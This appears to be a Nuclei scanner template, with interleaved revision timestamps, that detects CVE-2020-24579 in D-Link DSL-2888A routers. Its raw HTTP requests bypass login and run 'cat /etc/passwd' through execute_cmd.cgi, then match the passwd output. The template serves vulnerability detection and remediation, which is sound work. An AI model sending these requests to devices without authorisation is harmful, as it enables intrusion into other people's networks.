2021-01-30 17:41:47 +00:00
id : CVE-2020-24579
info :
2022-07-26 13:45:11 +00:00
name : D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
2021-01-30 17:41:47 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-07-26 13:45:11 +00:00
description : D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest firmware update provided by D-Link to fix the vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
2022-05-17 09:18:12 +00:00
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-24579
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-24579
cwe-id : CWE-287
2023-10-14 11:27:55 +00:00
epss-score : 0.00734
2023-10-25 17:36:19 +00:00
epss-percentile : 0.78668
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-15 16:29:17 +00:00
vendor : dlink
product : dsl2888a_firmware
tags : cve,cve2020,dlink,rce
2021-01-30 17:41:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-30 17:41:47 +00:00
- raw :
- | # Response:Location : /page/login/login_fail.html
POST / HTTP/1.1
Host : {{Hostname}}
Cookie : uid=6gPjT2ipmNz
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host : {{Hostname}}
Cookie : uid=6gPjT2ipmNz
matchers-condition : and
matchers :
- type : regex
regex :
- "nobody:[x*]:65534:65534"
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-01-31 10:28:15 +00:00
condition : or
2023-07-15 16:29:17 +00:00
- type : status
status :
- 200
2023-10-23 12:51:13 +00:00
# digest: 4b0a00483046022100859d3f5ab9a3082c62f0d10c4214674cec0418122a5c94eb7dac21677210125e022100b0816a279eb67080c6ba1aa0c543a51ea3238d8f4d3e3a478e1a19b799a31431:922c64590222798bb761d5b6d8e72950